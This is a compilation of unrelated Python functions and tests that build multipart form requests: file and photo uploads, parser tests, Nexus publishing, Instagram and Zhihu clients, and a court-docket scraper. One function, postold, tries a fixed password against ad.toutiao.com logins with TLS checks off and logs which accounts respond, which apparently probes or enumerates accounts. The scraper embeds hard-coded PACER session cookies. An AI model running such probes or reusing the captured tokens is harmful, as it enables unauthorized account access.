def save(self, cnxml):
    """Push new cnxml to RME.

    :param cnxml: module content as UTF-8 encoded bytes
    :return: the ``requests.Response`` from the import-form POST, so
        callers can check whether the import succeeded
    """
    data = MultipartEncoder(fields={
        'importFile': ('index.cnxml', cnxml.decode('utf-8')),
        'format': 'plain',
        'submit': 'Import',
        'form.submitted': '1',
        'came_from': 'module_text',
    })
    # Serialize the whole body up front so the Content-Type header's
    # boundary matches the body exactly.
    r = requests.post('%s/module_import_form' % self.url,
                      data=data.to_string(),
                      auth=self.auth,
                      headers={'Content-Type': data.content_type})
    # Fix: the response object was previously dropped, leaving callers
    # no way to detect a failed import.
    return r
def postold(csrfmiddle, cookie, mail):
    # Submit the legacy ad.toutiao.com login form for `mail` with a fixed
    # password, apparently to probe how the endpoint responds for this
    # account.
    # NOTE(review): Python 2 code (print statements); relies on a
    # module-level requests session `ss` and the `json` module.
    url = "https://ad.toutiao.com/old_login/"
    files = {
        "csrfmiddlewaretoken": (None, str(csrfmiddle)),
        "email": (None, str(mail)),
        "password": (None, "9090"),
    }
    from requests_toolbelt import MultipartEncoder
    # Fixed boundary reproduces a captured browser request byte-for-byte.
    m = MultipartEncoder(fields=files, boundary="----WebKitFormBoundaryRgFdemk5CNNZaY6j")
    headers = {
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;q=0.8,zh;q=0.6',
        'Connection': 'keep-alive',
        'Content-Type': m.content_type,
        'Host': 'ad.toutiao.com',
        'Cookie': cookie,
        'Origin': 'https://ad.toutiao.com',
        'Referer': 'https://ad.toutiao.com/old_login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
        'X-Requested-With': 'XMLHttpRequest',
    }
    # NOTE(review): TLS verification disabled — presumably to allow an
    # intercepting proxy; confirm before reuse.
    r = ss.post(url, headers=headers, data=m.to_string(), verify=False)
    pp = json.loads(r.text)
    # Code 1009 appears to mark the interesting case for this probe.
    if pp['code'] == 1009:
        print mail, "....", r.text
def upload_photo(self, photo, caption=None, upload_id=None):
    """Upload a photo to the Instagram photo-upload endpoint.

    :param photo: path to a JPEG file on disk
    :param caption: optional caption, forwarded to configure_photo()
    :param upload_id: optional upload id; defaults to a ms timestamp
    :return: True when upload + configure succeed, False otherwise
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.info('Photo does not have a compatible '
                         'photo aspect ratio.')
        return False
    # Fix: read the image with a context manager instead of passing an
    # open()ed handle into the fields dict, which leaked the handle.
    with open(photo, 'rb') as f:
        photo_bytes = f.read()
    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes,
                  'application/octet-stream',
                  {'Content-Transfer-Encoding': 'binary'}),
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'close',
                                 'User-Agent': self.user_agent})
    response = self.session.post(
        config.API_URL + "upload/photo/", data=m.to_string())
    if response.status_code == 200:
        if self.configure_photo(upload_id, photo, caption):
            self.expose()
            return True
    return False
def _upload_artifact(self, local_artifact, path_prefix, repo_id,
                     hostname_for_download=None, use_direct_put=False):
    """Upload one local artifact to Nexus and return the RemoteArtifact.

    :param local_artifact: artifact with .group/.artifact/.version/.local_path
    :param path_prefix: remote path prefix used for direct PUT uploads
    :param repo_id: target repository id
    :param hostname_for_download: override for the download base URL
    :param use_direct_put: PUT the file directly instead of using the
        maven/content form endpoint
    """
    filename = os.path.basename(local_artifact.local_path)
    logger.info('-> Uploading %s', filename)
    logger.debug('local artifact: %s', local_artifact)
    # rgavf stands for repo-group-artifact-version-filename.
    # Fix: the template was missing the {filename} placeholder, so the
    # computed path never contained the actual file name.
    gavf = '{group}/{name}/{ver}/{filename}'.format(
        group=local_artifact.group.replace('.', '/'),
        name=local_artifact.artifact,
        ver=local_artifact.version,
        filename=filename)
    rgavf = '{repo_id}/{gavf}'.format(repo_id=repo_id, gavf=gavf)
    with open(local_artifact.local_path, 'rb') as f:
        if not use_direct_put:
            data = {
                'g': local_artifact.group,
                'a': local_artifact.artifact,
                'v': local_artifact.version,
                'r': repo_id,
                'e': local_artifact.extension,
                'p': local_artifact.extension,
                'hasPom': 'false',
            }
            # Fix: dict.items() is a view in Python 3 and has no
            # .append(); materialize a list before extending it.
            data_list = list(data.items())
            data_list.append(('file', (filename, f, 'text/plain')))
            m_for_logging = MultipartEncoder(fields=data_list)
            logger.debug('payload: %s', m_for_logging.to_string())
            # to_string() consumed the file; rewind before re-encoding.
            f.seek(0)
            m = MultipartEncoder(fields=data_list)
            headers = {'Content-Type': m.content_type}
            self._send('service/local/artifact/maven/content',
                       method='POST', data=m, headers=headers)
            result = RemoteArtifact(group=local_artifact.group,
                                    artifact=local_artifact.artifact,
                                    version=local_artifact.version,
                                    classifier=local_artifact.classifier,
                                    extension=local_artifact.extension,
                                    repo_id=repo_id)
            self.resolve_artifact(result)
            return result
        else:
            headers = {'Content-Type': 'application/x-rpm'}
            remote_path = '{path_prefix}/{rgavf}'.format(
                path_prefix=path_prefix, rgavf=rgavf)
            self._send(remote_path, method='PUT', headers=headers, data=f)
            # If not specified, use the repository url for downloads.
            hostname_for_download = hostname_for_download or self._repository_url
            url = '{hostname}/content/repositories/{rgavf}'.format(
                hostname=hostname_for_download, rgavf=rgavf)
            # Get classifier and extension back from nexus metadata.
            path = ('service/local/repositories/{repo_id}/content/'
                    '{gavf}?describe=maven2'.format(repo_id=repo_id, gavf=gavf))
            maven_metadata = self._send_json(path)['data']
            return RemoteArtifact(group=maven_metadata['groupId'],
                                  artifact=maven_metadata['artifactId'],
                                  version=maven_metadata['version'],
                                  classifier=maven_metadata.get('classifier', ''),
                                  extension=maven_metadata.get('extension', ''),
                                  url=url,
                                  repo_id=repo_id)
def test_post_file_error(self):
    """Posting a duplicate sample file fails and creates no samples."""
    upload = StringIO('sample_name\tbarcode\nSample 1\t000000001\n')
    encoder = MultipartEncoder(fields={
        'sample-set': 'Sample Set 1',
        'type': 'test',
        'location': 'the freezer',
        'file': ('test_bc.txt', upload, 'text/plain'),
    })
    # No samples of this type exist before the request.
    self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
    obs = self.post('/sample/add/', encoder.to_string(),
                    headers={'Content-Type': encoder.content_type})
    self.assertEqual(obs.code, 200)
    self.assertIn('The object with name \'Sample 1\' already exists in '
                  'table \'sample\'', obs.body.decode('utf-8'))
    # And none were created by the failed request either.
    self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
def test_post_file(self):
    """Posting a valid sample file creates one sample per data row."""
    upload = StringIO('sample_name\tother_col\ntest1\tval1\ntest2\tval2\n')
    encoder = MultipartEncoder(fields={
        'sample-set': 'Sample Set 1',
        'type': 'test',
        'location': 'the freezer',
        'file': ('test_bc.txt', upload, 'text/plain'),
    })
    # No samples of this type exist before the request.
    self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
    obs = self.post('/sample/add/', encoder.to_string(),
                    headers={'Content-Type': encoder.content_type})
    self.assertEqual(obs.code, 200)
    self.assertIn('Created 2 samples from test_bc.txt',
                  obs.body.decode('utf-8'))
    # Both data rows became samples.
    self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 2)
def detect_face():
    """Flask endpoint: detect faces in the uploaded image.

    Saves the upload, runs the cascade classifier, draws green boxes
    around detections, and returns a multipart response containing the
    annotated JPEG plus the face rectangles as JSON.
    """
    file = request.files['file']
    file.save('input.jpg')
    test1 = shrink_img(cv2.imread('input.jpg'))
    gray_img = cv2.cvtColor(test1, cv2.COLOR_BGR2GRAY)
    haar_face_cascade = cv2.CascadeClassifier('lbpcascade_frontalface.xml')
    faces = haar_face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,
                                               minNeighbors=5)
    for (x, y, w, h) in faces:
        cv2.rectangle(test1, (x, y), (x + w, y + h), (0, 255, 0), 2)
    cv2.imwrite('output.jpg', test1)
    # Fix: detectMultiScale returns an empty tuple (which has no
    # .tolist()) when nothing is found; guard before converting.
    faces_json = json.dumps(faces.tolist() if len(faces) else [])
    # Fix: read the annotated image eagerly so the file handle is closed
    # instead of leaking an open file into the encoder.
    with open('output.jpg', 'rb') as annotated:
        image_bytes = annotated.read()
    fields = {}
    fields['image'] = ('output.jpg', image_bytes, 'image/jpeg')
    fields['face_rects'] = ('face_rects', faces_json, 'application/json')
    m = MultipartEncoder(fields)
    return Response(m.to_string(), mimetype=m.content_type)
def test_case_insensitive_content_type():
    """The parser must accept any capitalisation of 'Content-Type'."""
    variants = (
        'Content-Type',
        'content-type',
        'CONTENT-TYPE',
        'cOnTeNt-tYPe',
    )
    for header_key in variants:
        target = ValueTarget()
        encoder = MultipartEncoder(fields={'value': 'hello world'})
        parser = StreamingFormDataParser(
            headers={header_key: encoder.content_type})
        parser.register('value', target)
        parser.data_received(encoder.to_string())
        assert target.value == b'hello world'
def test_chunked_single():
    """Feeding the body in two chunks must reassemble the field value."""
    payload = 'hello world'
    target = ValueTarget()
    encoder = MultipartEncoder(fields={'value': payload})
    body = encoder.to_string()
    parser = StreamingFormDataParser(
        headers={'Content-Type': encoder.content_type})
    parser.register('value', target)
    # Split mid-value so the parser must buffer across the boundary.
    split_at = body.index(b'world')
    for chunk in (body[:split_at], body[split_at:]):
        parser.data_received(chunk)
    assert target.value == payload.encode('utf-8')
def uploadPhoto(self, photo, caption=None, upload_id=None):
    """Upload a photo, then configure and expose it.

    :param photo: path to a JPEG file on disk
    :param caption: optional caption forwarded to configure()
    :param upload_id: optional upload id; defaults to a ms timestamp
    :return: True when upload + configure + expose all ran, else False
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    # Fix: read the image via a context manager; the inline open() in the
    # fields dict leaked the file handle.
    with open(photo, 'rb') as f:
        photo_bytes = f.read()
    data = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes,
                  'application/octet-stream',
                  {'Content-Transfer-Encoding': 'binary'}),
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.s.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'close',
        'User-Agent': self.USER_AGENT
    })
    response = self.s.post(self.API_URL + "upload/photo/", data=m.to_string())
    self.logger.debug(".uploadPhoto response: status=%s content=%s",
                      response.status_code, response.content)
    if response.status_code == 200:
        configure_result = self.configure(upload_id, photo, caption)
        self.logger.debug(".uploadPhoto configure response: %s", configure_result)
        if configure_result:
            expose_result = self.expose()
            self.logger.debug(".uploadPhoto expose response: %s", expose_result)
            # Fix: report success; the original fell through and returned
            # False even after a successful configure + expose.
            return True
    return False
def uploadPhoto(self, photo, caption=None, upload_id=None):
    """Upload a photo after checking its aspect ratio.

    :param photo: path to a JPEG file on disk
    :param caption: optional caption forwarded to configurePhoto()
    :param upload_id: optional upload id; defaults to a ms timestamp
    :return: True on full success, False otherwise
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not compatibleAspectRatio(getImageSize(photo)):
        self.logger.info('Not compatible photo aspect ratio')
        return False
    # Fix: read the image with a context manager; the inline open() in
    # the fields dict leaked the file handle.
    with open(photo, 'rb') as f:
        photo_bytes = f.read()
    data = {
        'upload_id': upload_id,
        '_uuid': self.project.get_uuid(),
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes,
                  'application/octet-stream',
                  {'Content-Transfer-Encoding': 'binary'}),
    }
    m = MultipartEncoder(data, boundary=self.project.get_uuid())
    self.s.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'close',
        'User-Agent': settings.NOIRE['USER_AGENT']
    })
    response = self.s.post(settings.NOIRE['API_URL'] + "upload/photo/",
                           data=m.to_string())
    if response.status_code == 200:
        if self.configurePhoto(upload_id, photo, caption):
            self.expose()
            return True
    return False
def upload_photo(self, photo, caption=None, upload_id=None, from_video=False):
    """Upload a photo (or a video thumbnail) and configure the media.

    Resizes the image unless it came from a video, rejects incompatible
    aspect ratios, posts the bytes, then configures, exposes and renames
    the source file on success.
    """
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not from_video:
        photo = resize_image(photo)
        if not photo:
            return False
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.info('Photo does not have a compatible '
                         'photo aspect ratio.')
        return False
    with open(photo, 'rb') as image_file:
        image_data = image_file.read()
    fields = {
        'upload_id': upload_id,
        '_uuid': self.uuid,
        '_csrftoken': self.token,
        'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, image_data,
                  'application/octet-stream',
                  {'Content-Transfer-Encoding': 'binary'}),
    }
    encoder = MultipartEncoder(fields, boundary=self.uuid)
    extra_headers = {
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': encoder.content_type,
        'Connection': 'close',
        'User-Agent': self.user_agent,
    }
    self.session.headers.update(extra_headers)
    response = self.session.post(config.API_URL + "upload/photo/",
                                 data=encoder.to_string())
    if response.status_code != 200:
        return False
    if self.configure_photo(upload_id, photo, caption):
        self.expose()
        # Mark the local file as consumed so it isn't re-uploaded.
        from os import rename
        rename(photo, "{}.REMOVE_ME".format(photo))
        return True
    return False
def change_profile_pix(self, input_name, filename, file_address):
    """Upload a new profile picture.

    :param input_name: form field name expected by the endpoint
    :param filename: base name (without extension) sent to the server
    :param file_address: path to the JPEG file on disk
    :return: True when the server reports the profile changed
    """
    self.uuid = self.generate_uuid(False)
    url_change_profile_pix = self.url_change_profile_pix
    # Fix: open the image with a context manager; the inline open() in
    # the fields dict leaked the file handle.
    with open(file_address, 'rb') as image_file:
        data = {input_name: (filename + '.jpg', image_file, 'image/jpeg')}
        m = MultipartEncoder(data, boundary=self.uuid)
        self.s.headers.update({'Content-Type': 'multipart/form-data; boundary=' + self.uuid})
        # Serialize while the file is still open.
        r = self.s.post(url_change_profile_pix, data=m.to_string())
    all_data = json.loads(r.text)
    changed = False
    if "changed_profile" in all_data:
        if all_data["changed_profile"]:
            changed = True
    if changed:
        log_text = "Profile Pix Successfully Changed"
        returnValue = True
    else:
        log_text = "Profile Pix Upload Failed!"
        returnValue = False
    print(log_text)
    # Restore the session's default content type for subsequent calls.
    self.s.headers.update({'Content-Type': self.default_content_type})
    return returnValue
def test_content_type_passed_to_target():
    """The part's declared content type must be recorded on the target."""
    filename = 'image-600x400.png'
    # Read the raw bytes once to compare against the parsed value.
    with open_dataset(filename) as source:
        expected_data = source.read()
    target = ValueTarget()
    with open_dataset(filename) as source:
        encoder = MultipartEncoder(
            fields={filename: (filename, source, 'image/png')})
        parser = StreamingFormDataParser(
            headers={'Content-Type': encoder.content_type})
        parser.register(filename, target)
        parser.data_received(encoder.to_string())
    assert target.value == expected_data
    assert target.multipart_content_type == 'image/png'
def parse7(self, response):
    # Parse the ECF docket-report table: one <tr> per document. Each row
    # has a centered link whose onclick carries the arguments needed to
    # POST for the actual PDF (caseid, de_seq_num, ..., toggle flag).
    list1=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[@valign="top"]')
    for li in list1:
        try:
            # First cell: docket entry link text and bolded case name.
            case_number=li.xpath('td[1]/a//text()').extract()[0]
            case_name=li.xpath('td[1]/b/text()').extract()[0]
        except:
            # NOTE(review): bare except blanks rows whose first cell lacks
            # either element — any other error is silently swallowed too.
            case_number=""
            case_name=""
        link=li.xpath('td[@align="center"]/a/@href').extract()[0]
        codes=li.xpath('td[@align="center"]/a/@onclick').extract()[0]
        description=", ".join(li.xpath('td[4]//text()').extract())
        date_filed=li.xpath('td[2]/text()').extract()[0]
        # The onclick is a JS call like fn(x, caseid, de_seq_num, ..., t);
        # take positional arguments 1, 2 and 5 and strip quotes/spaces.
        code1=codes.split('(')[1].split(',')[1].replace("'","").replace('"','').replace(" ","")
        code2=codes.split('(')[1].split(',')[2].replace("'","").replace('"','').replace(" ","")
        code3=codes.split('(')[1].split(',')[5].replace("'","").replace('"','').replace(" ","")
        form_data={'caseid':code1, 'de_seq_num':code2, 'got_receipt':'1', 'pdf_toggle_possible':code3}
        me = MultipartEncoder(fields=form_data)
        me_boundary = me.boundary[2:] #need this in headers
        me_length = me.len #need this in headers
        me_body = me.to_string()
        header={'Connection': 'keep-alive' ,
                'Cache-Control': 'max-age=0' ,
                'Origin': 'https://ecf.almd.uscourts.gov' ,
                'Upgrade-Insecure-Requests': '1' ,
                # The boundary must match the encoder's (minus leading --).
                'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary,
                'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' ,
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' ,
                'Referer': 'https://ecf.almd.uscourts.gov/' ,
                'Accept-Encoding': 'gzip, deflate, br' ,
                'Accept-Language': 'en-US,en;q=0.9'}
        # 302/500 are handed to parse8 rather than auto-redirected/retried.
        req=scrapy.Request(link, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse8, method="POST")
        # Hard-coded PACER session cookies captured from a logged-in browser.
        req.cookies={'_ga':'GA1.2.1437274789.1534401822', 'ClientValidation':"", 'ClientCodeDescription':"", 'MENU':'slow', 'PacerSession':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode':'Lumina', 'PacerClient':"", 'ClientDesc':"", 'PacerPref':"receipt=Y"}
        # Unique on-disk pdf name derived from host + extracted codes.
        req.meta['pdfname']=response.meta['base_url'].split('/')[2].replace('.','_')+"_"+code1+"_"+code2+"_"+code3+".pdf"
        req.meta['base_url']=response.meta['base_url']
        req.meta['case_number']=case_number
        req.meta['case_name']=case_name
        req.meta['description']=description
        req.meta['date_filed']=date_filed
        yield req
def get_model(model_id):
    """ Try to download a specific model if allowed.
    Args:
        model_id (str) : model's id.
    Returns:
        Response : If allowed, returns serialized model.
    """
    # If not Allowed
    check = mm.is_model_copy_allowed(model_id)
    response = {}
    if not check["success"]:  # If not allowed
        if check["error"] == mm.MODEL_NOT_FOUND_MSG:
            status_code = 404  # Not Found
            # Fix: was mm.Model_NOT_FOUND_MSG (wrong casing), which would
            # raise AttributeError instead of returning the 404 body.
            response["error"] = mm.MODEL_NOT_FOUND_MSG
        else:
            status_code = 403  # Forbidden
            response["error"] = mm.NOT_ALLOWED_TO_DOWNLOAD_MSG
        return Response(json.dumps(response), status=status_code,
                        mimetype="application/json")
    # If allowed
    result = mm.get_serialized_model_with_id(model_id)
    if result["success"]:
        # Use correct encoding
        response = {
            "serialized_model": result["serialized_model"].decode("ISO-8859-1")
        }
        # If model is large split it in multiple parts
        if sys.getsizeof(response["serialized_model"]) >= MODEL_LIMIT_SIZE:
            form = MultipartEncoder(response)
            return Response(form.to_string(), mimetype=form.content_type)
        else:
            return Response(json.dumps(response), status=200,
                            mimetype="application/json")
    # Fix: previously fell through returning None (a Flask server error);
    # report the retrieval failure explicitly instead.
    response["error"] = result.get("error", "Unable to retrieve model.")
    return Response(json.dumps(response), status=500,
                    mimetype="application/json")
def test_chunked_multiple():
    """Delivering the body in 100-byte chunks must reassemble all fields."""
    expected = {
        'first': 'foo' * 1000,
        'second': 'bar' * 1000,
        'third': 'baz' * 1000,
    }
    targets = {name: ValueTarget() for name in expected}
    encoder = MultipartEncoder(fields=dict(expected))
    body = encoder.to_string()
    parser = StreamingFormDataParser(
        headers={'Content-Type': encoder.content_type})
    for name, target in targets.items():
        parser.register(name, target)
    # Feed the body in fixed-size slices.
    size = 100
    for start in range(0, len(body), size):
        parser.data_received(body[start:start + size])
    for name, target in targets.items():
        assert target.value == expected[name].encode('utf-8')
def test_send_mail(self, mock_send_mail_handler):
    """POSTing a multipart mail payload succeeds and hits the handler."""
    # PREPARE DATA
    template = "accounts_change_password"
    url_reverse = reverse('api:mail-list')
    params = {
        "name": faker.name(),
        "public_url": faker.url(),
        "recipients": [faker.email()],
    }
    payload = {
        "template": template,
        "params": json.dumps(params),
        "lang": "en",
    }
    encoder = MultipartEncoder(fields=payload)
    # DO ACTION
    response = self.client.post(url_reverse, data=encoder.to_string(),
                                content_type=encoder.content_type)
    # ASSERTS
    self.assertTrue(status.is_success(response.status_code))
    self.assertTrue(mock_send_mail_handler.called)
def _replace_at(self, name, value):
    """
    Replace the part for the given name with the given value and return
    the multipart data as a string. The original parts are not changed.

    :param name: name as string
    :param value: value as string
    :return: multipart data as string
    """
    # Work on a deep copy so the stored parts stay untouched.
    patched = deepcopy(self._parts)
    part = patched[name]
    # List-shaped parts carry their value at index 1; plain parts are
    # replaced wholesale.
    if isinstance(part, list):
        part[1] = value
    else:
        patched[name] = value
    encoder = MultipartEncoder(patched, boundary=self._boundary)
    return encoder.to_string().decode()
def test_basic_multiple():
    """All three simple fields must round-trip through the parser."""
    expected = {'first': b'foo', 'second': b'bar', 'third': b'baz'}
    targets = {name: ValueTarget() for name in expected}
    encoder = MultipartEncoder(
        fields={'first': 'foo', 'second': 'bar', 'third': 'baz'})
    parser = StreamingFormDataParser(
        headers={'Content-Type': encoder.content_type})
    for name, target in targets.items():
        parser.register(name, target)
    parser.data_received(encoder.to_string())
    for name, target in targets.items():
        assert target.value == expected[name]
def upload_media(self, input_name, filename, mention, media_comment):
    # Upload an image through Instagram's web-create flow, caption it
    # with `mention`, then like and comment on the resulting post.
    # Returns True when both the upload and the captioning step succeed
    # (or when the caption fails but the fallback comment was posted).
    self.uuid = self.generate_uuid(False)
    url_upload = self.url_upload
    upload_id = str(int(time.time() * 1000))
    data = {
        "upload_id": upload_id,
        # NOTE(review): file handle opened inline is never closed.
        input_name: (input_name+'.jpg', open(filename, 'rb'), 'image/jpeg')
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.s.headers.update({'Content-Type': 'multipart/form-data; boundary='+self.uuid})
    self.s.headers.update({'Referer': 'https://www.instagram.com/create/style/'})
    r = self.s.post(url_upload, data=m.to_string())
    all_data = json.loads(r.text)
    # trueAggregate counts the two success conditions: server returned an
    # upload_id, and a media id could be extracted after captioning.
    trueAggregate = 0
    if "upload_id" in all_data:
        upload_id = all_data["upload_id"]
        print('UPLOAD ID: '+str(upload_id))
        trueAggregate += 1
        all_data = self.add_caption(upload_id, mention)
        print(all_data)
        if len(all_data) > 0:
            user_id = all_data["media"]["caption"]["user_id"]
            media_id_user_id = all_data["media"]["id"]
            # The media id comes back as "<media>_<user>"; strip the
            # trailing user part to get the bare media id.
            media_id = str(media_id_user_id).replace("_"+str(user_id), "")
            if(len(media_id) > 0):
                trueAggregate += 1
                self.like(media_id)
                do_comment = self.comment(media_id, media_comment)
                print(do_comment)
            # Restore the session's default headers before returning.
            self.default_headers()
            if trueAggregate == 2:
                return True
            else:
                return False
        else:
            # Fallback: caption configuration failed, so comment directly
            # on the upload id instead.
            print('Media caption configuration failed. So comment was added')
            self.comment(upload_id, mention)
            return True
def do_test(self, data, dataset_name):
    """Run the upload subtest across a range of interesting file sizes."""
    useful_numbers = get_useful_numbers()
    idx = 0
    # Size 0 plus every "useful" size; idx is 1-based for subTest labels.
    for idx, file_size in enumerate(chain([0], useful_numbers), start=1):
        original_data = data[0:file_size]
        with BytesIO(data[0:file_size]) as dataset_:
            fields = {
                'file': ('file.dat', dataset_, 'binary/octet-stream')
            }
            encoder = MultipartEncoder(fields=fields)
            content_type = encoder.content_type
            multipart_data = encoder.to_string()
            self.subTest(idx, 'DifferentFileSizes.' + dataset_name, 1024,
                         original_data, content_type, multipart_data,
                         'file.dat')
    # Every size (including the extra 0) must have been exercised.
    self.assertEqual(idx, len(useful_numbers) + 1)
def upload_record_without_photo(self, record):
    """Upload a running record without a selfie."""
    m = MultipartEncoder(
        fields={
            'userId': str(self.studentID),
            'duration': str(record.duration),
            # The backend appears to use the date to detect duplicate
            # submissions.
            'date': str(record.date),
            # The route detail does not seem to be used for dedup checks.
            'detail': json.dumps(record.detail),
            'misc': json.dumps({"agent": "Android v1.2+"}),
            'step': str(record.step),
        })
    # WARNING: m.to_string() can only be consumed once — a second call
    # yields empty bytes — so never call it for debugging beforehand.
    respJson = self.post("record/{userId}".format(userId=self.studentID),
                         data=m.to_string(),
                         headers={'Content-Type': m.content_type},
                         auth=self.auth)
    if not respJson["data"]["verified"]:
        raise PKURunnerNotVerifiedError(
            "record is not verified, check your running params setting.")
def add_employee(self, emp_id, first_name, last_name, file=None):
    """Create an employee via the PIM addEmployee form.

    :param emp_id: employee id (used both as employeeId and empNumber)
    :param first_name: employee first name
    :param last_name: employee last name
    :param file: optional path to a PNG profile photo
    :return: the ``requests.Response`` from the form POST
    """
    resp = self.sess.get(f'{BASE_URL}/pim/addEmployee')
    # Scrape the CSRF token out of the form page.
    result = re.search('value="(.*)" id="csrf_token"', resp.text)
    csrf_token = result.group(1)
    data = {
        'firstName': first_name,
        'lastName': last_name,
        'employeeId': emp_id,
        'status': 'Enabled',
        'empNumber': emp_id,
        '_csrf_token': csrf_token
    }
    # Fix: open the photo with a context manager and serialize while it
    # is open; the inline open() previously leaked the file handle.
    if file:
        with open(file, 'rb') as photo:
            data['photofile'] = ('profile', photo, 'image/png')
            mpe = MultipartEncoder(fields=data)
            body = mpe.to_string()
    else:
        mpe = MultipartEncoder(fields=data)
        body = mpe.to_string()
    header = {'Content-Type': mpe.content_type}
    return self.sess.post(f'{BASE_URL}/pim/addEmployee',
                          headers=header, data=body)
def uploadPhoto(s,id,photo): id=str(id) s.debug_print('attempting to upload %s to event %s' %( id, photo)) url = s.api_url + 'photos.json' files = { 'token': (None, s.token), 'event_id': (None, id), 'image': (photo, open(photo,'rb'),mimetypes.guess_type(photo)[0])} #need to use MultipartEncoder to properly set boundary. #this isn't necessary, and it works without this boundary, #but this is what 2.6.9.6 uses as their setting, so I figured #it couldn't hurt. Useragent also matches :) m = MultipartEncoder(files,boundary='-----------------------------28947758029299') headers = {'User-Agent':'RestSharp/105.2.3.0', 'Content-Type': m.content_type,} r = requests.post(url,headers=headers,data=m.to_string()) #print r.headers #print r.text print r.content return
def login_post(self):
    """Submit the zhihu OAuth sign-in form; return True on success."""
    captcha = self.get_captcha()
    time_span = str(int(time.time() * 1000))
    form = {
        "client_id": "c3cef7c66a1843f8b3a9e6a1e3160e20",
        "grant_type": "password",
        "timestamp": time_span,
        "source": "com.zhihu.web",
        "signature": self.encry_signature(time_span),
        "username": "******" + self.phonenumber,
        "password": self.password,
        "captcha": captcha,
        "lang": "en",
        "ref_source": "homepage",
        "utm_source": ""
    }
    encode_data = MultipartEncoder(form, boundary=self.random_boundary())
    self.session.headers["Content-Type"] = encode_data.content_type
    # Forward CSRF / device cookies as headers when present.
    xsrf = self.session.cookies.get("_xsrf", None)
    if xsrf:
        self.session.headers["X-Xsrftoken"] = xsrf
    udid = self.session.cookies.get("d_c0", None)
    if udid:
        self.session.headers["X-UDID"] = udid.split("|")[0].strip('"')
    login_url = "https://www.zhihu.com/api/v3/oauth/sign_in"
    result = self.session.post(login_url,
                               data=encode_data.to_string()).json()
    error = result.get("error", None)
    if error:
        print(error.get("message"))
        return False
    print(result)
    return True
def putAttachments(self, rowId, manifest: Sequence["OdkxLocalFile"], data: List[bytes]):
    """
    Upload row attachments in a single multipart request.

    :param rowId: id of the row the attachments belong to
    :param manifest: ex. FilesystemAttachmentStore().getManifest(rowId)
    :param data: list of byte arrays, parallel to `manifest`
    """
    # One part per file; the content type falls back to image/jpg when
    # the manifest entry does not declare one.
    fields = {
        f"{srv.filename}": (f"{srv.filename}", d, srv.contentType or "image/jpg", {
            "Name": "file"
        })
        for srv, d in zip(manifest, data)
    }
    multi_image = MultipartEncoder(fields=fields)
    for part in multi_image.parts:
        # this is fix for odkx-sync-endpoint using custom content disposition "file"
        part.headers = part.headers.replace(b"form-data;", b"file;")
    # didn't get it to work as a stream, so the body is fully serialized
    payload = multi_image.to_string()
    return self.connection.POST(
        self.getTableDefinitionRoot() + "/attachments/" + rowId + "/upload",
        data=payload,
        headers={"Content-Type": multi_image.content_type})
